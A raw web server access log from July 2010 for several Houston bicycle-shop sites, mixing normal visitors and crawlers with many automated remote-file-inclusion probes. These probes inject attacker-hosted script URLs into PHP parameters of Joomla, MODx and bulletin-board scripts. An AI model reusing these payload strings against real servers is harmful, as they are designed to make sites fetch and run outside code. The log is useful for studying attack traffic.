217.113.61.155 - - [12/Jul/2010:07:40:17 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
217.113.61.155 - - [12/Jul/2010:07:40:17 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
62.141.56.49 - - [12/Jul/2010:07:46:09 -0700] "GET /logs/view.php?dir=http://helhetreklam.se/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
62.141.56.49 - - [12/Jul/2010:07:46:09 -0700] "GET /view.php?dir=http://helhetreklam.se/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
62.141.56.49 - - [12/Jul/2010:07:46:09 -0700] "GET /logs/access_100510.log/view.php?dir=http://helhetreklam.se/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
62.141.56.49 - - [12/Jul/2010:07:54:44 -0700] "GET /view.php?dir=http://helhetreklam.se/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
62.141.56.49 - - [12/Jul/2010:07:54:44 -0700] "GET /logs/access_100510.log/view.php?dir=http://helhetreklam.se/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
62.141.56.49 - - [12/Jul/2010:07:54:44 -0700] "GET /logs/view.php?dir=http://helhetreklam.se/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
208.92.234.103 - - [12/Jul/2010:08:09:11 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.92.234.103 - - [12/Jul/2010:08:09:49 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
93.187.141.58 - - [12/Jul/2010:08:13:52 -0700] "GET /logs/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
93.187.141.58 - - [12/Jul/2010:08:13:52 -0700] "GET /pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
93.187.141.58 - - [12/Jul/2010:08:13:58 -0700] "GET /logs/access_100510.log/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
93.187.141.58 - - [12/Jul/2010:08:14:05 -0700] "GET /logs/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
93.187.141.58 - - [12/Jul/2010:08:14:08 -0700] "GET /pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
93.187.141.58 - - [12/Jul/2010:08:14:16 -0700] "GET /logs/access_100510.log/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
212.95.54.182 - - [12/Jul/2010:08:23:36 -0700] "GET /logs/access_100310.log HTTP/1.0" 200 1245184 "http://svbikes.com/logs/access_100310.log" "Mozilla/3.0 (x86 [en] Windows NT 5.1; Sun)" "svbikes.com"
208.92.234.103 - - [12/Jul/2010:08:27:00 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.92.234.103 - - [12/Jul/2010:08:27:00 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.92.234.103 - - [12/Jul/2010:08:27:01 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.92.234.103 - - [12/Jul/2010:08:33:13 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.92.234.103 - - [12/Jul/2010:08:33:13 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.92.234.103 - - [12/Jul/2010:08:33:13 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
93.187.141.58 - - [12/Jul/2010:08:36:11 -0700] "GET /pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
93.187.141.58 - - [12/Jul/2010:08:36:11 -0700] "GET /logs/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
93.187.141.58 - - [12/Jul/2010:08:36:13 -0700] "GET /logs/access_091210.log%20%20/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
93.187.141.58 - - [12/Jul/2010:08:39:41 -0700] "GET /pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
93.187.141.58 - - [12/Jul/2010:08:39:47 -0700] "GET /logs/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
93.187.141.58 - - [12/Jul/2010:08:39:47 -0700] "GET /logs/access_091210.log%20%20/pccookbook.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
66.135.41.16 - - [12/Jul/2010:09:38:34 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
66.135.41.16 - - [12/Jul/2010:09:38:34 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
119.63.193.75 - - [12/Jul/2010:09:40:48 -0700] "GET /bullitinboard/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
98.199.169.174 - - [12/Jul/2010:09:41:39 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6" "www.svbikes.com"
98.199.169.174 - - [12/Jul/2010:09:41:39 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6" "www.svbikes.com"
98.199.169.174 - - [12/Jul/2010:09:41:39 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6" "www.svbikes.com"
98.199.169.174 - - [12/Jul/2010:09:41:42 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6" "www.svbikes.com"
119.63.193.75 - - [12/Jul/2010:09:42:54 -0700] "GET /bullitinboard/viewtopic.php?p=4429 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.svbikes.com"
66.135.41.16 - - [12/Jul/2010:09:43:08 -0700] "GET /logs/access_091010.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "svbikes.com"
66.135.41.16 - - [12/Jul/2010:09:43:08 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "svbikes.com"
66.135.41.16 - - [12/Jul/2010:09:43:08 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "svbikes.com"
208.80.193.39 - - [12/Jul/2010:09:48:09 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.5); .NET CLR 1.1.4322; MSN 6.1; MSNbMSFT; MSNmen-us; MSNc00; v5m)" "bicyclestoreshouston.com"
66.249.65.60 - - [12/Jul/2010:09:55:14 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "houstonbikeshop.com"
66.135.41.16 - - [12/Jul/2010:09:58:08 -0700] "GET /logs/access.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
66.135.41.16 - - [12/Jul/2010:09:58:08 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
66.135.41.16 - - [12/Jul/2010:09:58:08 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://server4.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
117.53.96.161 - - [12/Jul/2010:10:09:15 -0700] "HEAD / HTTP/1.0" 200 0 "http://www.svbikes.com" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
208.80.193.42 - - [12/Jul/2010:10:34:32 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; libero; ImageShack Toolbar 3.0.3; ImageShack Toolbar 3.0.6)" "www.svbikes.com"
217.113.61.155 - - [12/Jul/2010:11:04:15 -0700] "GET /logs/access.log//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
217.113.61.155 - - [12/Jul/2010:11:04:15 -0700] "GET /bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
217.113.61.155 - - [12/Jul/2010:11:04:15 -0700] "GET /logs//bbs///////good.php?board_skin_path=http://203.252.71.232/~edugraduate/data/file/sub3_1/ckrid1.txt?? HTTP/1.1" 404 - "-" "MaMa CaSpEr" "houstonbikeshop.com"
98.200.210.114 - - [12/Jul/2010:11:43:16 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; InfoPath.2; .NET CLR 3.0.30729; .NET4.0C)" "www.svbikes.com"
207.46.204.243 - - [12/Jul/2010:11:45:37 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
85.214.118.239 - - [12/Jul/2010:11:50:15 -0700] "GET /logs//components/com_sef/sef.php?mosConfig.absolute.path=http://www.prigorje-info.com/includes/teeste.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "houstonbikeshop.com"
85.214.118.239 - - [12/Jul/2010:11:50:16 -0700] "GET /components/com_sef/sef.php?mosConfig.absolute.path=http://www.prigorje-info.com/includes/teeste.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "houstonbikeshop.com"
207.46.204.243 - - [12/Jul/2010:11:57:26 -0700] "GET / HTTP/1.1" 200 1764 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "bicyclestoreshouston.com"
69.73.157.122 - - [12/Jul/2010:12:29:12 -0700] "GET /logs/access_100510.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.svbikes.com"
69.73.157.122 - - [12/Jul/2010:12:29:12 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.svbikes.com"
69.73.157.122 - - [12/Jul/2010:12:29:12 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.svbikes.com"
69.73.157.122 - - [12/Jul/2010:12:29:14 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
85.92.68.99 - - [12/Jul/2010:12:32:14 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.artbyvp.com/images/logo.db??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
85.92.68.99 - - [12/Jul/2010:12:32:14 -0700] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.artbyvp.com/images/logo.db??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
69.73.157.122 - - [12/Jul/2010:12:34:20 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.svbikes.com"
69.73.157.122 - - [12/Jul/2010:12:34:20 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.svbikes.com"
69.73.157.122 - - [12/Jul/2010:13:10:49 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
84.255.193.115 - - [12/Jul/2010:13:17:01 -0700] "GET /delete_all.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
84.255.193.115 - - [12/Jul/2010:13:17:01 -0700] "GET /logs//delete_all.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
84.255.193.115 - - [12/Jul/2010:13:17:01 -0700] "GET /logs/access.log//delete_all.php?board_skin_path=http://www.net-games.it/open.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
187.22.186.11 - - [12/Jul/2010:14:13:02 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" "www.svbikes.com"
91.214.44.59 - - [12/Jul/2010:14:16:58 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "bicyclestoreshouston.com"
91.214.44.59 - - [12/Jul/2010:14:18:37 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.svbikes.com"
67.195.112.217 - - [12/Jul/2010:14:20:06 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.112.217 - - [12/Jul/2010:14:20:06 -0700] "GET /?D=A HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
72.20.138.196 - - [12/Jul/2010:14:29:03 -0700] "GET / HTTP/1.0" 200 1748 "http://www.cannondale.com/Dealerlocator?s_loc=usa&s_language=usaeng" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
72.20.138.196 - - [12/Jul/2010:14:29:04 -0700] "GET /favicon.ico HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
72.20.138.196 - - [12/Jul/2010:14:29:11 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" "www.svbikes.com"
65.60.20.66 - - [12/Jul/2010:14:37:52 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [12/Jul/2010:14:37:52 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [12/Jul/2010:14:37:52 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [12/Jul/2010:14:37:58 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [12/Jul/2010:14:37:58 -0700] "GET /logs/access.log/components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [12/Jul/2010:14:37:58 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT%5bLANGUAGES_DIR%5d=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
76.203.156.225 - - [12/Jul/2010:14:59:30 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16" "www.svbikes.com"
76.203.156.225 - - [12/Jul/2010:14:59:30 -0700] "GET /favicon.ico HTTP/1.1" 404 - "http://www.svbikes.com/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16" "www.svbikes.com"
65.60.20.66 - - [12/Jul/2010:15:01:01 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [12/Jul/2010:15:01:01 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [12/Jul/2010:15:01:01 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [12/Jul/2010:15:01:02 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [12/Jul/2010:15:01:02 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
65.60.20.66 - - [12/Jul/2010:15:01:02 -0700] "GET /logs/access.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
38.111.147.83 - - [12/Jul/2010:15:05:48 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:14:29 -0700] "GET /logs/access_100310.log HTTP/1.0" 200 2818048 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:15:15 -0700] "GET /logs/access_100210.log HTTP/1.0" 200 3604480 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:16:41 -0700] "GET /logs/?S=A HTTP/1.0" 200 2924 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
67.195.115.87 - - [12/Jul/2010:15:17:56 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.115.87 - - [12/Jul/2010:15:17:58 -0700] "GET /bullitinboard/viewtopic.php?p=12504 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
38.111.147.83 - - [12/Jul/2010:15:18:35 -0700] "GET /logs/?N=D HTTP/1.0" 200 2924 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:20:17 -0700] "GET /logs/?M=A HTTP/1.0" 200 2924 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:30:27 -0700] "GET /translations/Polish.txt HTTP/1.0" 200 33091 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:32:10 -0700] "GET /translations/Norwegian.txt HTTP/1.0" 200 31468 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:42:04 -0700] "GET /translations/Korean.txt HTTP/1.0" 200 32652 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:42:50 -0700] "GET /translations/Japanese.txt HTTP/1.0" 200 32739 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:43:35 -0700] "GET /translations/Italian.txt HTTP/1.0" 200 33975 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
66.109.23.172 - - [12/Jul/2010:15:43:59 -0700] "GET /logs/access_100510.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
66.109.23.172 - - [12/Jul/2010:15:43:59 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
66.109.23.172 - - [12/Jul/2010:15:43:59 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:44:17 -0700] "GET /translations/Icelandic.txt HTTP/1.0" 200 32529 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
69.73.157.122 - - [12/Jul/2010:15:44:45 -0700] "GET /logs/access_100510.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.svbikes.com"
69.73.157.122 - - [12/Jul/2010:15:44:45 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.0" 404 - "-" "libwww-perl/5.833" "www.svbikes.com"
69.73.157.122 - - [12/Jul/2010:15:44:45 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:44:59 -0700] "GET /translations/Hungarian.txt HTTP/1.0" 200 32528 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
66.109.23.172 - - [12/Jul/2010:15:47:03 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "houstonbikeshop.com"
38.111.147.83 - - [12/Jul/2010:15:47:48 -0700] "GET /translations/?M=A HTTP/1.0" 200 3831 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:48:31 -0700] "GET /translations/?D=A HTTP/1.0" 200 3831 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
38.111.147.83 - - [12/Jul/2010:15:49:14 -0700] "GET /logs/access_090710.log HTTP/1.0" 200 2818048 "-" "TurnitinBot/2.1 (http://www.turnitin.com/robot/crawlerinfo.html)" "www.svbikes.com"
69.73.157.122 - - [12/Jul/2010:15:51:37 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "houstonbikeshop.com"
66.109.23.172 - - [12/Jul/2010:15:52:35 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
66.109.23.172 - - [12/Jul/2010:15:52:36 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.svbikes.com"
69.73.157.122 - - [12/Jul/2010:15:53:49 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://b0tn3t.fileave.com/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.svbikes.com"
